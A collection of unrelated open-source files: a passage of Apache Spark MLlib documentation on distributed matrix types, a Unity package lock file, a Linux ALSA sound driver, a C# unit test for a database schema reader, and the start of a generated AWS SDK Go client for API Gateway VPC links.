val m = mat.numRows() val n = mat.numCols() // QR decomposition val qrResult = mat.tallSkinnyQR(true) {% endhighlight %} </div> <div data-lang="java" markdown="1"> A [`RowMatrix`](api/java/org/apache/spark/mllib/linalg/distributed/RowMatrix.html) can be created from a `JavaRDD<Vector>` instance. Then we can compute its column summary statistics. Refer to the [`RowMatrix` Java docs](api/java/org/apache/spark/mllib/linalg/distributed/RowMatrix.html) for details on the API. {% highlight java %} import org.apache.spark.api.java.JavaRDD; import org.apache.spark.mllib.linalg.Vector; import org.apache.spark.mllib.linalg.distributed.RowMatrix; JavaRDD<Vector> rows = ... // a JavaRDD of local vectors // Create a RowMatrix from an JavaRDD<Vector>. RowMatrix mat = new RowMatrix(rows.rdd()); // Get its size. long m = mat.numRows(); long n = mat.numCols(); // QR decomposition QRDecomposition<RowMatrix, Matrix> result = mat.tallSkinnyQR(true); {% endhighlight %} </div> <div data-lang="python" markdown="1"> A [`RowMatrix`](api/python/pyspark.mllib.html#pyspark.mllib.linalg.distributed.RowMatrix) can be created from an `RDD` of vectors. Refer to the [`RowMatrix` Python docs](api/python/pyspark.mllib.html#pyspark.mllib.linalg.distributed.RowMatrix) for more details on the API. {% highlight python %} from pyspark.mllib.linalg.distributed import RowMatrix # Create an RDD of vectors. rows = sc.parallelize([[1, 2, 3], [4, 5, 6], [7, 8, 9], [10, 11, 12]]) # Create a RowMatrix from an RDD of vectors. mat = RowMatrix(rows) # Get its size. m = mat.numRows() # 4 n = mat.numCols() # 3 # Get the rows as an RDD of vectors again. rowsRDD = mat.rows {% endhighlight %} </div> </div> ### IndexedRowMatrix An `IndexedRowMatrix` is similar to a `RowMatrix` but with meaningful row indices. It is backed by an RDD of indexed rows, so that each row is represented by its index (long-typed) and a local vector. 
<div class="codetabs"> <div data-lang="scala" markdown="1"> An [`IndexedRowMatrix`](api/scala/index.html#org.apache.spark.mllib.linalg.distributed.IndexedRowMatrix) can be created from an `RDD[IndexedRow]` instance, where [`IndexedRow`](api/scala/index.html#org.apache.spark.mllib.linalg.distributed.IndexedRow) is a wrapper over `(Long, Vector)`. An `IndexedRowMatrix` can be converted to a `RowMatrix` by dropping its row indices. Refer to the [`IndexedRowMatrix` Scala docs](api/scala/index.html#org.apache.spark.mllib.linalg.distributed.IndexedRowMatrix) for details on the API. {% highlight scala %} import org.apache.spark.mllib.linalg.distributed.{IndexedRow, IndexedRowMatrix, RowMatrix} val rows: RDD[IndexedRow] = ... // an RDD of indexed rows // Create an IndexedRowMatrix from an RDD[IndexedRow]. val mat: IndexedRowMatrix = new IndexedRowMatrix(rows) // Get its size. val m = mat.numRows() val n = mat.numCols() // Drop its row indices. val rowMat: RowMatrix = mat.toRowMatrix() {% endhighlight %} </div> <div data-lang="java" markdown="1"> An [`IndexedRowMatrix`](api/java/org/apache/spark/mllib/linalg/distributed/IndexedRowMatrix.html) can be created from an `JavaRDD<IndexedRow>` instance, where [`IndexedRow`](api/java/org/apache/spark/mllib/linalg/distributed/IndexedRow.html) is a wrapper over `(long, Vector)`. An `IndexedRowMatrix` can be converted to a `RowMatrix` by dropping its row indices. Refer to the [`IndexedRowMatrix` Java docs](api/java/org/apache/spark/mllib/linalg/distributed/IndexedRowMatrix.html) for details on the API. {% highlight java %} import org.apache.spark.api.java.JavaRDD; import org.apache.spark.mllib.linalg.distributed.IndexedRow; import org.apache.spark.mllib.linalg.distributed.IndexedRowMatrix; import org.apache.spark.mllib.linalg.distributed.RowMatrix; JavaRDD<IndexedRow> rows = ... // a JavaRDD of indexed rows // Create an IndexedRowMatrix from a JavaRDD<IndexedRow>. 
IndexedRowMatrix mat = new IndexedRowMatrix(rows.rdd()); // Get its size. long m = mat.numRows(); long n = mat.numCols(); // Drop its row indices. RowMatrix rowMat = mat.toRowMatrix(); {% endhighlight %} </div> <div data-lang="python" markdown="1"> An [`IndexedRowMatrix`](api/python/pyspark.mllib.html#pyspark.mllib.linalg.distributed.IndexedRowMatrix) can be created from an `RDD` of `IndexedRow`s, where [`IndexedRow`](api/python/pyspark.mllib.html#pyspark.mllib.linalg.distributed.IndexedRow) is a wrapper over `(long, vector)`. An `IndexedRowMatrix` can be converted to a `RowMatrix` by dropping its row indices. Refer to the [`IndexedRowMatrix` Python docs](api/python/pyspark.mllib.html#pyspark.mllib.linalg.distributed.IndexedRowMatrix) for more details on the API. {% highlight python %} from pyspark.mllib.linalg.distributed import IndexedRow, IndexedRowMatrix # Create an RDD of indexed rows. # - This can be done explicitly with the IndexedRow class: indexedRows = sc.parallelize([IndexedRow(0, [1, 2, 3]), IndexedRow(1, [4, 5, 6]), IndexedRow(2, [7, 8, 9]), IndexedRow(3, [10, 11, 12])]) # - or by using (long, vector) tuples: indexedRows = sc.parallelize([(0, [1, 2, 3]), (1, [4, 5, 6]), (2, [7, 8, 9]), (3, [10, 11, 12])]) # Create an IndexedRowMatrix from an RDD of IndexedRows. mat = IndexedRowMatrix(indexedRows) # Get its size. m = mat.numRows() # 4 n = mat.numCols() # 3 # Get the rows as an RDD of IndexedRows. rowsRDD = mat.rows # Convert to a RowMatrix by dropping the row indices. rowMat = mat.toRowMatrix() {% endhighlight %} </div> </div> ### CoordinateMatrix A `CoordinateMatrix` is a distributed matrix backed by an RDD of its entries. Each entry is a tuple of `(i: Long, j: Long, value: Double)`, where `i` is the row index, `j` is the column index, and `value` is the entry value. A `CoordinateMatrix` should be used only when both dimensions of the matrix are huge and the matrix is very sparse. 
<div class="codetabs"> <div data-lang="scala" markdown="1"> A [`CoordinateMatrix`](api/scala/index.html#org.apache.spark.mllib.linalg.distributed.CoordinateMatrix) can be created from an `RDD[MatrixEntry]` instance, where [`MatrixEntry`](api/scala/index.html#org.apache.spark.mllib.linalg.distributed.MatrixEntry) is a wrapper over `(Long, Long, Double)`. A `CoordinateMatrix` can be converted to an `IndexedRowMatrix` with sparse rows by calling `toIndexedRowMatrix`. Other computations for `CoordinateMatrix` are not currently supported. Refer to the [`CoordinateMatrix` Scala docs](api/scala/index.html#org.apache.spark.mllib.linalg.distributed.CoordinateMatrix) for details on the API. {% highlight scala %} import org.apache.spark.mllib.linalg.distributed.{CoordinateMatrix, MatrixEntry} val entries: RDD[MatrixEntry] = ... // an RDD of matrix entries // Create a CoordinateMatrix from an RDD[MatrixEntry]. val mat: CoordinateMatrix = new CoordinateMatrix(entries) // Get its size. val m = mat.numRows() val n = mat.numCols() // Convert it to an IndexRowMatrix whose rows are sparse vectors. val indexedRowMatrix = mat.toIndexedRowMatrix() {% endhighlight %} </div> <div data-lang="java" markdown="1"> A [`CoordinateMatrix`](api/java/org/apache/spark/mllib/linalg/distributed/CoordinateMatrix.html) can be created from a `JavaRDD<MatrixEntry>` instance, where [`MatrixEntry`](api/java/org/apache/spark/mllib/linalg/distributed/MatrixEntry.html) is a wrapper over `(long, long, double)`. A `CoordinateMatrix` can be converted to an `IndexedRowMatrix` with sparse rows by calling `toIndexedRowMatrix`. Other computations for `CoordinateMatrix` are not currently supported. Refer to the [`CoordinateMatrix` Java docs](api/java/org/apache/spark/mllib/linalg/distributed/CoordinateMatrix.html) for details on the API. 
{% highlight java %} import org.apache.spark.api.java.JavaRDD; import org.apache.spark.mllib.linalg.distributed.CoordinateMatrix; import org.apache.spark.mllib.linalg.distributed.IndexedRowMatrix; import org.apache.spark.mllib.linalg.distributed.MatrixEntry; JavaRDD<MatrixEntry> entries = ... // a JavaRDD of matrix entries // Create a CoordinateMatrix from a JavaRDD<MatrixEntry>. CoordinateMatrix mat = new CoordinateMatrix(entries.rdd()); // Get its size. long m = mat.numRows(); long n = mat.numCols(); // Convert it to an IndexRowMatrix whose rows are sparse vectors. IndexedRowMatrix indexedRowMatrix = mat.toIndexedRowMatrix(); {% endhighlight %} </div> <div data-lang="python" markdown="1"> A [`CoordinateMatrix`](api/python/pyspark.mllib.html#pyspark.mllib.linalg.distributed.CoordinateMatrix) can be created from an `RDD` of `MatrixEntry` entries, where [`MatrixEntry`](api/python/pyspark.mllib.html#pyspark.mllib.linalg.distributed.MatrixEntry) is a wrapper over `(long, long, float)`. A `CoordinateMatrix` can be converted to a `RowMatrix` by calling `toRowMatrix`, or to an `IndexedRowMatrix` with sparse rows by calling `toIndexedRowMatrix`. Refer to the [`CoordinateMatrix` Python docs](api/python/pyspark.mllib.html#pyspark.mllib.linalg.distributed.CoordinateMatrix) for more details on the API. {% highlight python %} from pyspark.mllib.linalg.distributed import CoordinateMatrix, MatrixEntry # Create an RDD of coordinate entries. # - This can be done explicitly with the MatrixEntry class: entries = sc.parallelize([MatrixEntry(0, 0, 1.2), MatrixEntry(1, 0, 2.1), MatrixEntry(6, 1, 3.7)]) # - or using (long, long, float) tuples: entries = sc.parallelize([(0, 0, 1.2), (1, 0, 2.1), (2, 1, 3.7)]) # Create an CoordinateMatrix from an RDD of MatrixEntries. mat = CoordinateMatrix(entries) # Get its size. m = mat.numRows() # 3 n = mat.numCols() # 2 # Get the entries as an RDD of MatrixEntries. entriesRDD = mat.entries # Convert to a RowMatrix. 
rowMat = mat.toRowMatrix() # Convert to an IndexedRowMatrix. indexedRowMat = mat.toIndexedRowMatrix() # Convert to a BlockMatrix. blockMat = mat.toBlockMatrix() {% endhighlight %} </div> </div> ### BlockMatrix A `BlockMatrix` is a distributed matrix backed by an RDD of `MatrixBlock`s, where a `MatrixBlock` is a tuple of `((Int, Int), Matrix)`, where the `(Int, Int)` is the index of the block, and `Matrix` is the sub-matrix at the given index with size `rowsPerBlock` x `colsPerBlock`. `BlockMatrix` supports methods such as `add` and `multiply` with another `BlockMatrix`. `BlockMatrix` also has a helper function `validate` which can be used to check whether the `BlockMatrix` is set up properly. <div class="codetabs"> <div data-lang="scala" markdown="1"> A [`BlockMatrix`](api/scala/index.html#org.apache.spark.mllib.linalg.distributed.BlockMatrix) can be most easily created from an `IndexedRowMatrix` or `CoordinateMatrix` by calling `toBlockMatrix`. `toBlockMatrix` creates blocks of size 1024 x 1024 by default. Users may change the block size by supplying the values through `toBlockMatrix(rowsPerBlock, colsPerBlock)`. Refer to the [`BlockMatrix` Scala docs](api/scala/index.html#org.apache.spark.mllib.linalg.distributed.BlockMatrix) for details on the API. {% highlight scala %} import org.apache.spark.mllib.linalg.distributed.{BlockMatrix, CoordinateMatrix, MatrixEntry} val entries: RDD[MatrixEntry] = ... // an RDD of (i, j, v) matrix entries // Create a CoordinateMatrix from an RDD[MatrixEntry]. val coordMat: CoordinateMatrix = new CoordinateMatrix(entries) // Transform the CoordinateMatrix to a BlockMatrix val matA: BlockMatrix = coordMat.toBlockMatrix().cache() // Validate whether the BlockMatrix is set up properly. Throws an Exception when it is not valid. // Nothing happens if it is valid. matA.validate() // Calculate A^T A. 
val ata = matA.transpose.multiply(matA) {% endhighlight %} </div> <div data-lang="java" markdown="1"> A [`BlockMatrix`](api/java/org/apache/spark/mllib/linalg/distributed/BlockMatrix.html) can be most easily created from an `IndexedRowMatrix` or `CoordinateMatrix` by calling `toBlockMatrix`. `toBlockMatrix` creates blocks of size 1024 x 1024 by default. Users may change the block size by supplying the values through `toBlockMatrix(rowsPerBlock, colsPerBlock)`. Refer to the [`BlockMatrix` Java docs](api/java/org/apache/spark/mllib/linalg/distributed/BlockMatrix.html) for details on the API. {% highlight java %} import org.apache.spark.api.java.JavaRDD; import org.apache.spark.mllib.linalg.distributed.BlockMatrix; import org.apache.spark.mllib.linalg.distributed.CoordinateMatrix; import org.apache.spark.mllib.linalg.distributed.IndexedRowMatrix; JavaRDD<MatrixEntry> entries = ... // a JavaRDD of (i, j, v) Matrix Entries // Create a CoordinateMatrix from a JavaRDD<MatrixEntry>. CoordinateMatrix coordMat = new CoordinateMatrix(entries.rdd()); // Transform the CoordinateMatrix to a BlockMatrix BlockMatrix matA = coordMat.toBlockMatrix().cache(); // Validate whether the BlockMatrix is set up properly. Throws an Exception when it is not valid. // Nothing happens if it is valid. matA.validate(); // Calculate A^T A. BlockMatrix ata = matA.transpose().multiply(matA); {% endhighlight %} </div> <div data-lang="python" markdown="1"> A [`BlockMatrix`](api/python/pyspark.mllib.html#pyspark.mllib.linalg.distributed.BlockMatrix) can be created from an `RDD` of sub-matrix blocks, where a sub-matrix block is a `((blockRowIndex, blockColIndex), sub-matrix)` tuple. Refer to the [`BlockMatrix` Python docs](api/python/pyspark.mllib.html#pyspark.mllib.linalg.distributed.BlockMatrix) for more details on the API. {% highlight python %} from pyspark.mllib.linalg import Matrices from pyspark.mllib.linalg.distributed import BlockMatrix # Create an RDD of sub-matrix blocks. 
blocks = sc.parallelize([((0, 0), Matrices.dense(3, 2, [1, 2, 3, 4, 5, 6])), ((1, 0), Matrices.dense(3, 2, [7, 8, 9, 10, 11, 12]))]) # Create a BlockMatrix from an RDD of sub-matrix blocks. mat = BlockMatrix(blocks, 3, 2) # Get its size. m = mat.numRows() # 6 n = mat.numCols() # 2 # Get the blocks as an RDD of sub-matrix blocks. blocksRDD = mat.blocks # Convert to a LocalMatrix. localMat = mat.toLocalMatrix() # Convert to an IndexedRowMatrix. indexedRowMat = mat.toIndexedRowMatrix() # Convert to a CoordinateMatrix. coordinateMat = mat.toCoordinateMatrix() {% endhighlight %} </div> </div>
{ "pile_set_name": "Github" }
{ "dependencies": { "com.unity.2d.sprite": { "version": "1.0.0", "depth": 0, "source": "builtin", "dependencies": {} }, "com.unity.addressables": { "version": "1.8.4", "depth": 0, "source": "registry", "dependencies": { "com.unity.scriptablebuildpipeline": "1.7.3", "com.unity.modules.assetbundle": "1.0.0", "com.unity.modules.unitywebrequest": "1.0.0", "com.unity.modules.unitywebrequestassetbundle": "1.0.0" }, "url": "https://packages.unity.com" }, "com.unity.build-report-inspector": { "version": "0.2.2-preview", "depth": 0, "source": "registry", "dependencies": {}, "url": "https://packages.unity.com" }, "com.unity.burst": { "version": "1.2.3", "depth": 0, "source": "registry", "dependencies": { "com.unity.mathematics": "1.1.0" }, "url": "https://packages.unity.com" }, "com.unity.cinemachine": { "version": "2.6.0", "depth": 0, "source": "registry", "dependencies": {}, "url": "https://packages.unity.com" }, "com.unity.editorcoroutines": { "version": "1.0.0", "depth": 1, "source": "registry", "dependencies": {}, "url": "https://packages.unity.com" }, "com.unity.ext.nunit": { "version": "1.0.0", "depth": 2, "source": "registry", "dependencies": {}, "url": "https://packages.unity.com" }, "com.unity.ide.rider": { "version": "2.0.5", "depth": 0, "source": "registry", "dependencies": { "com.unity.test-framework": "1.1.1" }, "url": "https://packages.unity.com" }, "com.unity.ide.visualstudio": { "version": "2.0.1", "depth": 0, "source": "registry", "dependencies": {}, "url": "https://packages.unity.com" }, "com.unity.ide.vscode": { "version": "1.2.1", "depth": 0, "source": "registry", "dependencies": {}, "url": "https://packages.unity.com" }, "com.unity.inputsystem": { "version": "1.0.0", "depth": 0, "source": "registry", "dependencies": {}, "url": "https://packages.unity.com" }, "com.unity.mathematics": { "version": "1.1.0", "depth": 0, "source": "registry", "dependencies": {}, "url": "https://packages.unity.com" }, "com.unity.memoryprofiler": { "version": 
"0.2.4-preview.1", "depth": 0, "source": "registry", "dependencies": { "com.unity.editorcoroutines": "1.0.0" }, "url": "https://packages.unity.com" }, "com.unity.render-pipelines.core": { "version": "9.0.0-preview.38", "depth": 1, "source": "registry", "dependencies": { "com.unity.ugui": "1.0.0" }, "url": "https://packages.unity.com" }, "com.unity.render-pipelines.universal": { "version": "9.0.0-preview.35", "depth": 0, "source": "registry", "dependencies": { "com.unity.mathematics": "1.1.0", "com.unity.burst": "1.2.3", "com.unity.render-pipelines.core": "9.0.0-preview.38", "com.unity.shadergraph": "9.0.0-preview.34" }, "url": "https://packages.unity.com" }, "com.unity.scriptablebuildpipeline": { "version": "1.7.3", "depth": 1, "source": "registry", "dependencies": {}, "url": "https://packages.unity.com" }, "com.unity.searcher": { "version": "4.2.0", "depth": 2, "source": "registry", "dependencies": {}, "url": "https://packages.unity.com" }, "com.unity.shadergraph": { "version": "9.0.0-preview.34", "depth": 1, "source": "registry", "dependencies": { "com.unity.render-pipelines.core": "9.0.0-preview.38", "com.unity.searcher": "4.2.0" }, "url": "https://packages.unity.com" }, "com.unity.terrain-tools": { "version": "3.0.1-preview", "depth": 0, "source": "registry", "dependencies": {}, "url": "https://packages.unity.com" }, "com.unity.test-framework": { "version": "1.1.14", "depth": 1, "source": "registry", "dependencies": { "com.unity.ext.nunit": "1.0.0", "com.unity.modules.imgui": "1.0.0", "com.unity.modules.jsonserialize": "1.0.0" }, "url": "https://packages.unity.com" }, "com.unity.textmeshpro": { "version": "3.0.0-preview.14", "depth": 0, "source": "registry", "dependencies": { "com.unity.ugui": "1.0.0" }, "url": "https://packages.unity.com" }, "com.unity.timeline": { "version": "1.3.4", "depth": 0, "source": "registry", "dependencies": {}, "url": "https://packages.unity.com" }, "com.unity.ugui": { "version": "1.0.0", "depth": 0, "source": "builtin", 
"dependencies": { "com.unity.modules.ui": "1.0.0" } }, "com.verasl.water-system": { "version": "file:com.verasl.water-system", "depth": 0, "source": "embedded", "dependencies": { "com.unity.mathematics": "1.1.0", "com.unity.burst": "1.2.3", "com.unity.render-pipelines.universal": "7.4.1" } }, "net.peeweek.gameplay-ingredients": { "version": "https://github.com/peeweek/net.peeweek.gameplay-ingredients.git#2019.3.0", "depth": 0, "source": "git", "dependencies": { "com.unity.cinemachine": "2.3.4" }, "hash": "604801ada543d20bc302f6310305fe29016d23d2" }, "com.unity.modules.ai": { "version": "1.0.0", "depth": 0, "source": "builtin", "dependencies": {} }, "com.unity.modules.androidjni": { "version": "1.0.0", "depth": 0, "source": "builtin", "dependencies": {} }, "com.unity.modules.animation": { "version": "1.0.0", "depth": 0, "source": "builtin", "dependencies": {} }, "com.unity.modules.assetbundle": { "version": "1.0.0", "depth": 0, "source": "builtin", "dependencies": {} }, "com.unity.modules.audio": { "version": "1.0.0", "depth": 0, "source": "builtin", "dependencies": {} }, "com.unity.modules.cloth": { "version": "1.0.0", "depth": 0, "source": "builtin", "dependencies": { "com.unity.modules.physics": "1.0.0" } }, "com.unity.modules.director": { "version": "1.0.0", "depth": 0, "source": "builtin", "dependencies": { "com.unity.modules.audio": "1.0.0", "com.unity.modules.animation": "1.0.0" } }, "com.unity.modules.imageconversion": { "version": "1.0.0", "depth": 0, "source": "builtin", "dependencies": {} }, "com.unity.modules.imgui": { "version": "1.0.0", "depth": 0, "source": "builtin", "dependencies": {} }, "com.unity.modules.jsonserialize": { "version": "1.0.0", "depth": 0, "source": "builtin", "dependencies": {} }, "com.unity.modules.particlesystem": { "version": "1.0.0", "depth": 0, "source": "builtin", "dependencies": {} }, "com.unity.modules.physics": { "version": "1.0.0", "depth": 0, "source": "builtin", "dependencies": {} }, "com.unity.modules.physics2d": { 
"version": "1.0.0", "depth": 0, "source": "builtin", "dependencies": {} }, "com.unity.modules.screencapture": { "version": "1.0.0", "depth": 0, "source": "builtin", "dependencies": { "com.unity.modules.imageconversion": "1.0.0" } }, "com.unity.modules.subsystems": { "version": "1.0.0", "depth": 1, "source": "builtin", "dependencies": { "com.unity.modules.jsonserialize": "1.0.0" } }, "com.unity.modules.terrain": { "version": "1.0.0", "depth": 0, "source": "builtin", "dependencies": {} }, "com.unity.modules.terrainphysics": { "version": "1.0.0", "depth": 0, "source": "builtin", "dependencies": { "com.unity.modules.physics": "1.0.0", "com.unity.modules.terrain": "1.0.0" } }, "com.unity.modules.ui": { "version": "1.0.0", "depth": 0, "source": "builtin", "dependencies": {} }, "com.unity.modules.uielements": { "version": "1.0.0", "depth": 0, "source": "builtin", "dependencies": { "com.unity.modules.ui": "1.0.0", "com.unity.modules.imgui": "1.0.0", "com.unity.modules.jsonserialize": "1.0.0", "com.unity.modules.uielementsnative": "1.0.0" } }, "com.unity.modules.uielementsnative": { "version": "1.0.0", "depth": 1, "source": "builtin", "dependencies": { "com.unity.modules.ui": "1.0.0", "com.unity.modules.imgui": "1.0.0", "com.unity.modules.jsonserialize": "1.0.0" } }, "com.unity.modules.umbra": { "version": "1.0.0", "depth": 0, "source": "builtin", "dependencies": {} }, "com.unity.modules.unityanalytics": { "version": "1.0.0", "depth": 0, "source": "builtin", "dependencies": { "com.unity.modules.unitywebrequest": "1.0.0", "com.unity.modules.jsonserialize": "1.0.0" } }, "com.unity.modules.unitywebrequest": { "version": "1.0.0", "depth": 0, "source": "builtin", "dependencies": {} }, "com.unity.modules.unitywebrequestassetbundle": { "version": "1.0.0", "depth": 0, "source": "builtin", "dependencies": { "com.unity.modules.assetbundle": "1.0.0", "com.unity.modules.unitywebrequest": "1.0.0" } }, "com.unity.modules.unitywebrequestaudio": { "version": "1.0.0", "depth": 0, "source": 
"builtin", "dependencies": { "com.unity.modules.unitywebrequest": "1.0.0", "com.unity.modules.audio": "1.0.0" } }, "com.unity.modules.unitywebrequesttexture": { "version": "1.0.0", "depth": 0, "source": "builtin", "dependencies": { "com.unity.modules.unitywebrequest": "1.0.0", "com.unity.modules.imageconversion": "1.0.0" } }, "com.unity.modules.unitywebrequestwww": { "version": "1.0.0", "depth": 0, "source": "builtin", "dependencies": { "com.unity.modules.unitywebrequest": "1.0.0", "com.unity.modules.unitywebrequestassetbundle": "1.0.0", "com.unity.modules.unitywebrequestaudio": "1.0.0", "com.unity.modules.audio": "1.0.0", "com.unity.modules.assetbundle": "1.0.0", "com.unity.modules.imageconversion": "1.0.0" } }, "com.unity.modules.video": { "version": "1.0.0", "depth": 0, "source": "builtin", "dependencies": { "com.unity.modules.audio": "1.0.0", "com.unity.modules.ui": "1.0.0", "com.unity.modules.unitywebrequest": "1.0.0" } }, "com.unity.modules.vr": { "version": "1.0.0", "depth": 0, "source": "builtin", "dependencies": { "com.unity.modules.jsonserialize": "1.0.0", "com.unity.modules.physics": "1.0.0", "com.unity.modules.xr": "1.0.0" } }, "com.unity.modules.wind": { "version": "1.0.0", "depth": 0, "source": "builtin", "dependencies": {} }, "com.unity.modules.xr": { "version": "1.0.0", "depth": 0, "source": "builtin", "dependencies": { "com.unity.modules.physics": "1.0.0", "com.unity.modules.jsonserialize": "1.0.0", "com.unity.modules.subsystems": "1.0.0" } } } }
{ "pile_set_name": "Github" }
/* * snappercl15.c -- SoC audio for Bluewater Systems Snapper CL15 module * * Copyright (C) 2008 Bluewater Systems Ltd * Author: Ryan Mallon * * This program is free software; you can redistribute it and/or modify it * under the terms of the GNU General Public License as published by the * Free Software Foundation; either version 2 of the License, or (at your * option) any later version. * */ #include <linux/platform_device.h> #include <linux/module.h> #include <sound/core.h> #include <sound/pcm.h> #include <sound/soc.h> #include <asm/mach-types.h> #include <mach/hardware.h> #include "../codecs/tlv320aic23.h" #define CODEC_CLOCK 5644800 static int snappercl15_hw_params(struct snd_pcm_substream *substream, struct snd_pcm_hw_params *params) { struct snd_soc_pcm_runtime *rtd = substream->private_data; struct snd_soc_dai *codec_dai = rtd->codec_dai; struct snd_soc_dai *cpu_dai = rtd->cpu_dai; int err; err = snd_soc_dai_set_sysclk(codec_dai, 0, CODEC_CLOCK, SND_SOC_CLOCK_IN); if (err) return err; err = snd_soc_dai_set_sysclk(cpu_dai, 0, CODEC_CLOCK, SND_SOC_CLOCK_OUT); if (err) return err; return 0; } static struct snd_soc_ops snappercl15_ops = { .hw_params = snappercl15_hw_params, }; static const struct snd_soc_dapm_widget tlv320aic23_dapm_widgets[] = { SND_SOC_DAPM_HP("Headphone Jack", NULL), SND_SOC_DAPM_LINE("Line In", NULL), SND_SOC_DAPM_MIC("Mic Jack", NULL), }; static const struct snd_soc_dapm_route audio_map[] = { {"Headphone Jack", NULL, "LHPOUT"}, {"Headphone Jack", NULL, "RHPOUT"}, {"LLINEIN", NULL, "Line In"}, {"RLINEIN", NULL, "Line In"}, {"MICIN", NULL, "Mic Jack"}, }; static struct snd_soc_dai_link snappercl15_dai = { .name = "tlv320aic23", .stream_name = "AIC23", .cpu_dai_name = "ep93xx-i2s", .codec_dai_name = "tlv320aic23-hifi", .codec_name = "tlv320aic23-codec.0-001a", .platform_name = "ep93xx-i2s", .dai_fmt = SND_SOC_DAIFMT_I2S | SND_SOC_DAIFMT_NB_IF | SND_SOC_DAIFMT_CBS_CFS, .ops = &snappercl15_ops, }; static struct snd_soc_card snd_soc_snappercl15 = 
{ .name = "Snapper CL15", .owner = THIS_MODULE, .dai_link = &snappercl15_dai, .num_links = 1, .dapm_widgets = tlv320aic23_dapm_widgets, .num_dapm_widgets = ARRAY_SIZE(tlv320aic23_dapm_widgets), .dapm_routes = audio_map, .num_dapm_routes = ARRAY_SIZE(audio_map), }; static int snappercl15_probe(struct platform_device *pdev) { struct snd_soc_card *card = &snd_soc_snappercl15; int ret; ret = ep93xx_i2s_acquire(); if (ret) return ret; card->dev = &pdev->dev; ret = snd_soc_register_card(card); if (ret) { dev_err(&pdev->dev, "snd_soc_register_card() failed: %d\n", ret); ep93xx_i2s_release(); } return ret; } static int snappercl15_remove(struct platform_device *pdev) { struct snd_soc_card *card = platform_get_drvdata(pdev); snd_soc_unregister_card(card); ep93xx_i2s_release(); return 0; } static struct platform_driver snappercl15_driver = { .driver = { .name = "snappercl15-audio", }, .probe = snappercl15_probe, .remove = snappercl15_remove, }; module_platform_driver(snappercl15_driver); MODULE_AUTHOR("Ryan Mallon"); MODULE_DESCRIPTION("ALSA SoC Snapper CL15"); MODULE_LICENSE("GPL"); MODULE_ALIAS("platform:snappercl15-audio");
{ "pile_set_name": "Github" }
using DatabaseSchemaReader.Conversion; using DatabaseSchemaReader.DataSchema; using Microsoft.VisualStudio.TestTools.UnitTesting; namespace DatabaseSchemaReaderTest.DataSchema { [TestClass] public class DatabaseSchemaTest { [TestMethod] public void TestSqlTypeConstructor() { var schema = new DatabaseSchema(null, SqlType.SqlServer); //translated to correct provider name Assert.AreEqual("System.Data.SqlClient", schema.Provider); //it round trips back to SqlType Assert.AreEqual(SqlType.SqlServer, ProviderToSqlType.Convert(schema.Provider)); //we'll check all the others in same test schema = new DatabaseSchema(null, SqlType.Oracle); Assert.AreEqual("System.Data.OracleClient", schema.Provider); Assert.AreEqual(SqlType.Oracle, ProviderToSqlType.Convert(schema.Provider)); schema = new DatabaseSchema(null, SqlType.MySql); Assert.AreEqual("MySql.Data.MySqlClient", schema.Provider); Assert.AreEqual(SqlType.MySql, ProviderToSqlType.Convert(schema.Provider)); schema = new DatabaseSchema(null, SqlType.SQLite); Assert.AreEqual("System.Data.SQLite", schema.Provider); Assert.AreEqual(SqlType.SQLite, ProviderToSqlType.Convert(schema.Provider)); schema = new DatabaseSchema(null, SqlType.SqlServerCe); Assert.AreEqual("System.Data.SqlServerCe.4.0", schema.Provider); Assert.AreEqual(SqlType.SqlServerCe, ProviderToSqlType.Convert(schema.Provider)); schema = new DatabaseSchema(null, SqlType.PostgreSql); Assert.AreEqual("Npgsql", schema.Provider); Assert.AreEqual(SqlType.PostgreSql, ProviderToSqlType.Convert(schema.Provider)); schema = new DatabaseSchema(null, SqlType.Db2); Assert.AreEqual("IBM.Data.DB2", schema.Provider); Assert.AreEqual(SqlType.Db2, ProviderToSqlType.Convert(schema.Provider)); } [TestMethod] public void TestInitializeCollections() { var schema = new DatabaseSchema(null, null); Assert.IsNotNull(schema.Tables); Assert.IsNotNull(schema.Views); Assert.IsNotNull(schema.Users); Assert.IsNotNull(schema.StoredProcedures); Assert.IsNotNull(schema.Sequences); 
Assert.IsNotNull(schema.Packages); Assert.IsNotNull(schema.Functions); Assert.IsNotNull(schema.DataTypes); } [TestMethod] public void TestFindByName() { var schema = new DatabaseSchema(null, null); schema.AddTable("Orders") .AddTable("Products"); var table = schema.FindTableByName("products"); Assert.IsNotNull(table); Assert.AreEqual("Products", table.Name); } } }
{ "pile_set_name": "Github" }
// Code generated by smithy-go-codegen DO NOT EDIT. package apigateway import ( "context" awsmiddleware "github.com/aws/aws-sdk-go-v2/aws/middleware" "github.com/aws/aws-sdk-go-v2/aws/retry" "github.com/aws/aws-sdk-go-v2/aws/signer/v4" "github.com/aws/aws-sdk-go-v2/service/apigateway/types" smithy "github.com/awslabs/smithy-go" "github.com/awslabs/smithy-go/middleware" smithyhttp "github.com/awslabs/smithy-go/transport/http" ) // Gets the VpcLinks () collection under the caller's account in a selected region. func (c *Client) GetVpcLinks(ctx context.Context, params *GetVpcLinksInput, optFns ...func(*Options)) (*GetVpcLinksOutput, error) { stack := middleware.NewStack("GetVpcLinks", smithyhttp.NewStackRequest) options := c.options.Copy() for _, fn := range optFns { fn(&options) } addawsRestjson1_serdeOpGetVpcLinksMiddlewares(stack) awsmiddleware.AddRequestInvocationIDMiddleware(stack) smithyhttp.AddContentLengthMiddleware(stack) AddResolveEndpointMiddleware(stack, options) v4.AddComputePayloadSHA256Middleware(stack) retry.AddRetryMiddlewares(stack, options) addHTTPSignerV4Middleware(stack, options) awsmiddleware.AddAttemptClockSkewMiddleware(stack) addClientUserAgent(stack) smithyhttp.AddErrorCloseResponseBodyMiddleware(stack) smithyhttp.AddCloseResponseBodyMiddleware(stack) stack.Initialize.Add(newServiceMetadataMiddleware_opGetVpcLinks(options.Region), middleware.Before) addRequestIDRetrieverMiddleware(stack) addResponseErrorMiddleware(stack) addAcceptHeader(stack) for _, fn := range options.APIOptions { if err := fn(stack); err != nil { return nil, err } } handler := middleware.DecorateHandler(smithyhttp.NewClientHandler(options.HTTPClient), stack) result, metadata, err := handler.Handle(ctx, params) if err != nil { return nil, &smithy.OperationError{ ServiceID: ServiceID, OperationName: "GetVpcLinks", Err: err, } } out := result.(*GetVpcLinksOutput) out.ResultMetadata = metadata return out, nil } // Gets the VpcLinks () collection under the caller's account in a 
